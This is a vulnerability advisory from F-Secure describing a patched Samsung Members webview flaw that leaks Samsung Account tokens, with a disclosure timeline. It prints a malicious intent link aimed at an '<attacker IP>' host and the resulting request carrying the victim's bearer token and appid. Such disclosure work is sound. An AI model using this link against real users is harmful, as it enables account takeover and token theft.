|Product||Samsung phones with Samsung Members (version dependent on OS)|
F-Secure looked into exploiting the Samsung S20 device for Tokyo Pwn2Own 2020. An issue was discovered that would have allowed an attacker to gain access to the victim's Samsung Account.
Samsung Members (com.samsung.android.voc) is an application which offers tips and solutions for Samsung device owners. For US and South Korean users, the app also offers a portal to login to Samsung Members, the official Samsung loyalty program.
A webview within the Samsung Rewards section of the application could be used to obtain access to someone's Samsung account. The following launchable intent could be used to replicate this issue:
<a href="intent://launch?url=http://<attacker IP>:8000/yay.html&action=sso&from=ZZ&iso=ZZ#Intent;scheme=samsungrewards;package=com.samsung.android.voc;action=android.intent.action.VIEW;end;">yay click here yay</a>
Users that have a vulnerable version of Samsung Members installed are at risk of having their Samsung Account compromised via the above browsable link. After tapping the above link on a vulnerable phone, the application will make a HTTP request similar to the following, which contains the user’s authorization bearer token and appid. In this scenario, an attacker controls the IP address located at "<attacker IP>":
GET /yay.html HTTP/1.1 Host: <attacker IP>:8000 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Linux; Android 10; SM-G985F Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/85.0.4183.127 Mobile Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 authorization: Bearer <bearer value> x-osp-appid: <appid value> X-Requested-With: com.samsung.android.voc Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close
Using these two pieces of information, it is possible for an attacker to make a series of requests that would give the attacker access to the user’s Samsung Account. F-Secure developed a Python Proof of Concept (PoC) script that would automate the series of requests and print the account's profile information. The screenshot below shows the PoC script in action (left) and what the phone displays during exploitation (right):
The PoC script can be found on F-Secure's GitHub page at https://github.com/FSecureLABS/CVE-2021-25374_Samsung-Account-Access.
Samsung has released patched versions of Samsung Members which addresses the above issue. The version that should be downloaded depends on the OS of the device itself.
|03/10/2020||Issue disclosed to Samsung Mobile Security|
|03/10/2020||Issue assigned to a Samsung Security Analyst|
|25/10/2020||Samsung confirms the vulnerability and rates it as a high risk issue|
|11/01/2021||Follow up sent to Samsung|
|11/01/2021||Samsung responded to follow up saying a patch is still being worked on|
|06/04/2021||Patch released, Samsung initiates process for bug bounty reward|